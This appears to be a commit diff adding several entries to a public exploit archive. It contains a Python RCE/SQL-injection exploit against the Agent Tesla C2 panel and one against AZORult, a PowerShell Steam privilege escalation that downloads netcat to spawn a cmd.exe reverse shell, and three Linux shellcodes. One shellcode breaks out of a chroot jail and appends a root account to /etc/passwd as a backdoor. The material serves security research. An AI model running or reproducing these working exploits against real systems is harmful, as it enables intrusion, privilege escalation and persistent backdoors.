DB: 2019-08-14

6 changes to exploits/shellcodes

Steam Windows Client - Local Privilege Escalation
Agent Tesla Botnet - Arbitrary Code Execution
AZORult Botnet - SQL Injection

Linux/Tru64 alpha - execve(/bin/sh) Shellcode (108 bytes)
Linux/x86 - execve(_/bin/sh_) + tolower() Shellcode
Linux/x86 - Multiple In-Memory Modules (Prompt + Privilege Restore + Break­ Chroot Jail + Backdoor) + Signature Evasion Shellcode
This commit is contained in:
Offensive Security 2019-08-14 05:02:24 +00:00
parent a32e028b88
commit 998fb1eeec
8 changed files with 505 additions and 0 deletions

54
exploits/php/remote/47243.py Executable file
View file

@ -0,0 +1,54 @@
import requests
import argparse
import base64
# Agent Tesla C2 RCE by prsecurity
# For research purposes only. Don't pwn what you don't own.
def get_args():
parser = argparse.ArgumentParser(
prog="agent_tesla_sploit.py",
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=50),
epilog= '''
This script will exploit the RCE/SQL vulnerability in Agent Tesla Dashboard.
''')
parser.add_argument("target", help="URL of WebPanel (ex: http://target.com/WebPanel/)")
parser.add_argument("-c", "--command", default="id", help="Command to execute (default = id)")
parser.add_argument("-p", "--proxy", default="socks5://localhost:9150", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = tor)")
args = parser.parse_args()
return args
def pwn_target(target, command, proxy):
requests.packages.urllib3.disable_warnings()
proxies = {'http': proxy, 'https': proxy}
print('[*] Probing...')
get_params = {
'table':'screens',
'primary':'HWID',
'clmns':'a:1:{i:0;a:3:{s:2:"db";s:4:"HWID";s:2:"dt";s:4:"HWID";s:9:"formatter";s:4:"exec";}}',
'where': base64.b64encode("1=1 UNION SELECT \"{}\"".format(command).encode('utf-8'))
}
target = target + '/server_side/scripts/server_processing.php'
try:
r = requests.get("http://bot.whatismyipaddress.com", proxies=proxies)
print("[*] Your IP: {}".format(r.text))
headers = {
"User-agent":"Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
}
r = requests.get(target, params=get_params, headers=headers, verify=False, proxies=proxies)
result = r.json()['data'][-1]['HWID']
print('[+] {}'.format(result))
except:
print("[-] ERROR: Something went wrong.")
print(r.text)
raise
def main():
print ()
print ('Agent Tesla RCE by prsecurity.')
args = get_args()
pwn_target(args.target.strip(), args.command.strip(), args.proxy.strip())
if __name__ == '__main__':
main()

95
exploits/php/remote/47244.py Executable file
View file

@ -0,0 +1,95 @@
import requests
import argparse
import base64
# Azorult 3.3.1 C2 SQLi by prsecurity
# For research purposes only. Don't pwn what you don't own.
# change GUID and XOR key to specific beacon, can be extracted from a sample
guid = "353E77DF-928B-4941-A631-512662F0785A3061-4E40-BBC2-3A27F641D32B-54FF-44D7-85F3-D950F519F12F353E77DF-928B-4941-A631-512662F0785A3061-4E40-BBC2-3A27F641D32B-54FF-44D7-85F3-D950F519F12F"
key = "\x03\x55\xae"
def get_args():
parser = argparse.ArgumentParser(
prog="azorult_sploit.py",
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=50),
epilog= '''
This script will exploit the SQL vulnerability in Azorult 3.3.1 Dashboard.
''')
parser.add_argument("target", help="URL of index.php (ex: http://target.com/index.php)")
parser.add_argument("-n", "--id_record", default="1", help="id of record to dump")
parser.add_argument("-p", "--proxy", default="http://localhost:8080", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = tor)")
args = parser.parse_args()
return args
def CB_XORm(data, key):
j=0
key = list(key)
data = list(data)
tmp = list()
for i in range(len(data)):
tmp.append(chr(ord(data[i])^ord(key[j])))
j += 1
if j > (len(key)-1):
j = 0
return "".join(tmp)
def pwn_target(target, num_records, proxy):
requests.packages.urllib3.disable_warnings()
proxies = {'http': proxy, 'https': proxy}
try:
r = requests.get("http://bot.whatismyipaddress.com", proxies=proxies)
print("[*] Your IP: {}".format(r.text))
headers = {
"Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
}
print('[+] Getting URL, LOGIN AND PASS')
data = [
"|".join([
"1","2","3","4","5","6","7","8","9","10","11","12"
]),
"\r\n".join([
"|".join(["1","2","3","4"," "*255+"'", ", (select version())), (111,(select * from (select concat({},0x3a,p_p2) from passwords limit {},1) dumb),333,4,5,6,7), (111,(select * from (select concat({},0x3a,p_p3) from passwords limit {},1) dumb),333,4,5,6,7) -- ".format(num_records, num_records,num_records, num_records)])
]),
"c",
"d",
":".join(["'11","22"])
]
payload = CB_XORm(guid.join(data), key)
r = requests.post(target, data=payload, headers=headers, verify=False, proxies=proxies)
if r.text != "OK":
print("[-] ERROR: Something went wrong. Maybe Azorult version is not 3.3.1?")
raise
print('[+] Getting LOGIN/PASS')
data = [
"|".join([
"1","2","3","4","5","6","7","8","9","10","11","12"
]),
"\r\n".join([
"|".join(["1","2","3","4"," "*255+"'", ", (select version())), (111,(select * from (select concat({},0x3a,p_p1) from passwords limit {},1) dumb),333,4,5,6,7) -- ".format(num_records, num_records)])
]),
"c",
"d",
":".join(["'11","22"])
]
payload = CB_XORm(guid.join(data), key)
r = requests.post(target, data=payload, headers=headers, verify=False, proxies=proxies)
if r.text != "OK":
print("[-] ERROR: Something went wrong. Maybe Azorult version is not 3.3.1?")
raise
print('[+] If this worked, you will see two new records in password table at guest.php')
except:
print("[-] ERROR: Something went wrong.")
print(r.text)
raise
def main():
print ()
print ('Azorult 3.3.1 SQLi by prsecurity')
args = get_args()
pwn_target(args.target.strip(), args.num_records.strip(), args.proxy.strip())
if __name__ == '__main__':
main()

View file

@ -0,0 +1,30 @@
$SteamRegKey = "HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS"
$MSIRegKey = "HKLM:\SYSTEM\CurrentControlSet\Services\msiserver"
$RegDir = "C:\Windows\Temp\RegLN.exe"
$PayDir = "C:\Windows\Temp\payload.exe"
$Payload = "c:\windows\system32\cmd.exe /c c:\windows\temp\payload.exe 127.0.0.1 4444 -e cmd.exe"
$PayDownload = "https://raw.githubusercontent.com/AbsoZed/SteamPrivEsc/master/nc.exe"
$RegDownload = "https://raw.githubusercontent.com/AbsoZed/SteamPrivEsc/master/RegLN.exe"
$WebClient = New-Object System.Net.WebClient
If(!((Test-Path -Path $RegDir) -And (Test-Path -Path $PayDir)))
{
$WebClient.DownloadFile($PayDownload, $PayDir)
$WebClient.DownloadFile($RegDownload, $RegDir)
}
If(Get-ItemProperty -Path $SteamRegKey -Name ImagePath -ErrorAction SilentlyContinue)
{
Start-Service -DisplayName "Steam Client Service"
Set-ItemProperty -Path $MSIRegKey -Name "ImagePath" -Value $Payload
Start-Service -Name "msiserver"
}
Else
{
Remove-Item -Path $SteamRegKey -Recurse
Start-Process -FilePath $RegDir -ArgumentList "HKLM\Software\Wow6432Node\Valve\Steam\NSIS HKLM\SYSTEM\CurrentControlSet\Services\msiserver"
Start-Service -DisplayName "Steam Client Service"
Set-ItemProperty -Path $MSIRegKey -Name "ImagePath" -Value $Payload
Start-Service -Name "msiserver"
}

View file

@ -10631,6 +10631,7 @@ id,file,description,date,author,type,platform,port
47174,exploits/multiple/local/47174.sh,"ASAN/SUID - Local Privilege Escalation",2019-01-12,bcoles,local,multiple,
47176,exploits/windows/local/47176.cpp,"Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation",2019-07-26,ShivamTrivedi,local,windows,
47231,exploits/linux/local/47231.py,"Ghidra (Linux) 9.0.4 - .gar Arbitrary Code Execution",2019-08-12,"Etienne Lacoche",local,linux,
47238,exploits/windows/local/47238.ps1,"Steam Windows Client - Local Privilege Escalation",2019-08-12,AbsoZed,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -17603,6 +17604,8 @@ id,file,description,date,author,type,platform,port
47228,exploits/multiple/remote/47228.rb,"ManageEngine Application Manager 14.2 - Privilege Escalation / Remote Command Execution (Metasploit)",2019-08-12,AkkuS,remote,multiple,
47229,exploits/multiple/remote/47229.rb,"ManageEngine OpManager 12.4x - Unauthenticated Remote Command Execution (Metasploit)",2019-08-12,AkkuS,remote,multiple,
47230,exploits/linux/remote/47230.rb,"Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit)",2019-08-12,AkkuS,remote,linux,
47243,exploits/php/remote/47243.py,"Agent Tesla Botnet - Arbitrary Code Execution",2019-08-13,prsecurity,remote,php,
47244,exploits/php/remote/47244.py,"AZORult Botnet - SQL Injection",2019-08-13,prsecurity,remote,php,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,

Can't render this file because it is too large.

View file

@ -993,3 +993,6 @@ id,file,description,date,author,type,platform
47200,shellcodes/linux_x86/47200.c,"Linux/x86 - chmod(/etc/shadow_ 0666) Polymorphic Shellcode (53 bytes)",2019-08-01,"Daniel Ortiz",shellcode,linux_x86
47201,shellcodes/linux_x86/47201.c,"Linux/x86 - ASLR Disable Polymorphic Shellcode (107 bytes)",2019-08-01,"Daniel Ortiz",shellcode,linux_x86
47202,shellcodes/linux_x86/47202.c,"Linux/x86 - Force Reboot Shellcode (51 bytes)",2019-08-01,"Daniel Ortiz",shellcode,linux_x86
47239,shellcodes/linux/47239.c,"Linux/Tru64 alpha - execve(/bin/sh) Shellcode (108 bytes)",2019-03-25,"Hacker House",shellcode,linux
47240,shellcodes/linux_x86/47240.S,"Linux/x86 - execve(_/bin/sh_) + tolower() Shellcode",2019-03-23,"Hacker House",shellcode,linux_x86
47242,shellcodes/linux_x86/47242.asm,"Linux/x86 - Multiple In-Memory Modules (Prompt + Privilege Restore + Break­ Chroot Jail + Backdoor) + Signature Evasion Shellcode",2019-03-23,"Hacker House",shellcode,linux_x86

1 id file description date author type platform
993 47200 shellcodes/linux_x86/47200.c Linux/x86 - chmod(/etc/shadow_ 0666) Polymorphic Shellcode (53 bytes) 2019-08-01 Daniel Ortiz shellcode linux_x86
994 47201 shellcodes/linux_x86/47201.c Linux/x86 - ASLR Disable Polymorphic Shellcode (107 bytes) 2019-08-01 Daniel Ortiz shellcode linux_x86
995 47202 shellcodes/linux_x86/47202.c Linux/x86 - Force Reboot Shellcode (51 bytes) 2019-08-01 Daniel Ortiz shellcode linux_x86
996 47239 shellcodes/linux/47239.c Linux/Tru64 alpha - execve(/bin/sh) Shellcode (108 bytes) 2019-03-25 Hacker House shellcode linux
997 47240 shellcodes/linux_x86/47240.S Linux/x86 - execve(_/bin/sh_) + tolower() Shellcode 2019-03-23 Hacker House shellcode linux_x86
998 47242 shellcodes/linux_x86/47242.asm Linux/x86 - Multiple In-Memory Modules (Prompt + Privilege Restore + Break­ Chroot Jail + Backdoor) + Signature Evasion Shellcode 2019-03-23 Hacker House shellcode linux_x86

49
shellcodes/linux/47239.c Normal file
View file

@ -0,0 +1,49 @@
/* Alpha (AXP) Linux/Tru64 execve() shellcode
* ==========================================
* This shellcode uses the stack to store a generated
* "callsys" instruction, due to this it needs executable
* stack. To test on Linux use "execstack -s <bin>" and
* on Tru64 use "sysconfig -r proc executable_stack=1".
*
* Tested against Tru64 5.1B & Linux 2.6.26-2-alpha-generic
*
* -- Hacker Fantastic (https://hacker.house)
*/
#include <stdio.h>
#include <stdlib.h>
unsigned char shellcode[] = {
"\x80\xff\xde\x23" /* lda $sp,-128($sp) */
"\x73\x68\x3f\x24" /* ldil $1, 0x68732f2f */
"\x2f\x2f\x21\x20" /* sll $1, 0x20 */
"\x21\x17\x24\x48" /* ldil $2, 0x6e69622f */
"\x69\x6e\x5f\x24" /* addq $1, $2, $1 */
"\x2f\x62\x42\x20" /* stq $31, -32($sp) */
"\x01\x04\x22\x40" /* stq $31, -24($sp) */
"\xe0\xff\xfe\xb7" /* stq $31, -8($sp) */
"\xe8\xff\xfe\xb7" /* stq $1, -16($sp) */
"\xf8\xff\xfe\xb7" /* mov $sp, $16 */
"\xf0\xff\x3e\xb4" /* subq $16, 0x10, $16 */
"\x10\x04\xfe\x47" /* stq $16, -40($sp) */
"\x30\x15\x02\x42" /* mov $sp, $17 */
"\xd8\xff\x1e\xb6" /* subq $17, 0x28, $17 */
"\x11\x04\xfe\x47" /* mov $sp, $18 */
"\x31\x15\x25\x42" /* subq $18, 0x18, $18 */
"\x12\x04\xfe\x47" /* ldil $0, 0xffffff3c */
"\x32\x15\x43\x42" /* ldil $1, 0xffffff01 */
"\x3c\xff\x1f\x20" /* subq $0, $1, $0 */
"\x01\xff\x3f\x20" /* ldil $1, 0xffffff84 */
"\x20\x05\x01\x40" /* ldil $2, 0xffffff01 */
"\x84\xff\x3f\x20" /* subq $1, $2, $1 */
"\x01\xff\x5f\x20" /* stl $1, -48($sp) */
"\x21\x05\x22\x40" /* subq $sp, 0x30, $sp */
"\xd0\xff\x3e\xb0" /* jmp $sp,($sp),0xff10 */
"\x3e\x15\xc6\x43"
"\xc4\x3f\xde\x6b"
};
int main(){
int (*func)();
func = (int (*)())shellcode;
func();
}

View file

@ -0,0 +1,67 @@
# tolower() execve() /bin/sh -c (user supplied command)
# shellcode to evade tolower() and friends, requires %esi
# to reference a valid writeable address (usually does)
.text
.global _start
_start:
jmp data
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
start:
popl %edi
movl %edi, %ecx
xorl %eax,%eax
movl %eax,%es:(%esi)
pushl %es:(%esi)
pushl $0x68732f2f
pushl $0x6e69622f
movl %esp,%ebx
movl %eax,%es:(%esi)
pushl %es:(%esi)
pushw $0x632d
movl %esp,%edi
movl %eax,%es:(%esi)
pushl %es:(%esi)
movl %ecx,%eax
movl %eax,%es:(%esi)
pushl %es:(%esi)
movl %edi,%eax
movl %eax,%es:(%esi)
pushl %es:(%esi)
movl %ebx,%eax
movl %eax,%es:(%esi)
pushl %es:(%esi)
movl %esp,%esi
movl %esi,%ecx
xorl %eax, %eax
movb $0x08, %al
addb $0x03, %al
int $0x80
data:
call start
#command
.ascii "id"

View file

@ -0,0 +1,204 @@
;# Description: SCORE - The ShellCORE
;# score is a complete shellcode for x86 processors running
;# linux. It is designed to help work further with an exploited
;# process.
;#
;# Coded by: prdelka
;#########################
;# [CORE] #
;#########################
;--- NOP Equivalent instruction
cld
cld
cld
cld
cld
cld
cld
cld
cld
cld
cld
cld
;--- core initialise
jmp $+0x06
pop edi
push edi
jmp edi
call $-0x04
;--- core prompt
pop edi
push 0x3e0a7964
push 0x61655220
push 0x65726f43
xor eax,eax
mov al,0x4
xor ebx,ebx
mov bl,0x1
mov ecx,esp
xor edx,edx
mov dl,0xc
int 0x80
;--- core read choice
xor eax,eax
mov ebp,esp
push eax
mov al,0x3
xor ebx,ebx
mov bl,0x1
mov ecx,ebp
xor edx,edx
mov dl,0x2
int 0x80
;--- core module selector
mov edx,ebp
;### [backdoor module] 'b'
cmp word[edx],0x0a62
je $+0x5e
;### [break-chroot-jail module] 'j'
cmp word[edx],0x0a6a
je $+0x59
;### [privilege restore module] 'p'
cmp word[edx],0x0a70
je $+0x37
;### [shellcode module] 's'
cmp word[edx],0x0a73
je $+0x14
;### [exit module] 'x'
cmp word[edx],0x0a78
je $+0x05
;--- core loop
push edi
jmp edi
;#########################
;# [MODULES] #
;#########################
;--- [exit module]
xor eax,eax
mov al,0x1
xor ebx,ebx
int 0x80
;--- [shellcode module]
xor eax,eax
push eax
push 0x68732f2f
push 0x6e69622f
mov ebx,esp
push eax
mov edx,esp
push ebx
mov ecx,esp
mov al,0xB
int 0x80
;### [core loop]
push edi
jmp edi
;--- [privilege restore module]
xor eax,eax
mov ah,0x17
shr eax,0x8
xor ebx,ebx
int 0x80
xor eax,eax
mov ah,0x2e
shr eax,0x8
xor ebx,ebx
int 0x80
;### [core loop]
push edi
jmp edi
;### [LONG backdoor module jump]
jmp $+0x46
;--- [break-chroot-jail]
xor eax,eax
push eax
push 0x6c69616a
mov ebx,esp
mov edx,esp
mov cx,0x2F3
mov al,0x27
int 0x80
xor eax,eax
push eax
mov ebx,edx
mov al,0x3d
int 0x80
push 0x2e2e2e2e
mov ebx,esp
add bl,0x2
mov edx,ebx
xor ecx,ecx
mov cl,0xff
mov al,0x0c
mov ebx,edx
int 0x80
loop $-0x06
mov ebx,edx
add bl,0x1
mov al,0x3d
int 0x80
;### [core loop]
push edi
jmp edi
;--- [backdoor module]
xor eax,eax
push eax
push 0x64777373
push 0x61702f2f
push 0x6374652f
mov esi,esp
xor edx,edx
xor ecx,ecx
mov cl,0x01
mov ebx,esi
xor eax,eax
mov al,0x5
int 0x80
push eax
mov esi,esp
xor eax,eax
mov al,0x13
mov ebx,[esi]
xor ecx,ecx
xor edx,edx
mov dl,0x2
int 0x80
xor eax,eax
mov al,0x4
mov ebx,[esi]
xor ecx,ecx
push ecx
push 0x0a687361
push 0x622f6e69
push 0x622f3a74
push 0x6f6f722f
push 0x3a676663
push 0x20726f66
push 0x20726573
push 0x75206d65
push 0x74737973
push 0x3a303a30
push 0x3a3a6766
push 0x63737973
mov ecx,esp
xor edx,edx
mov dl,0x30
int 0x80
xor eax,eax
mov al,0x6
mov ebx,[esi]
int 0x80
;### [core loop]
push edi
jmp edi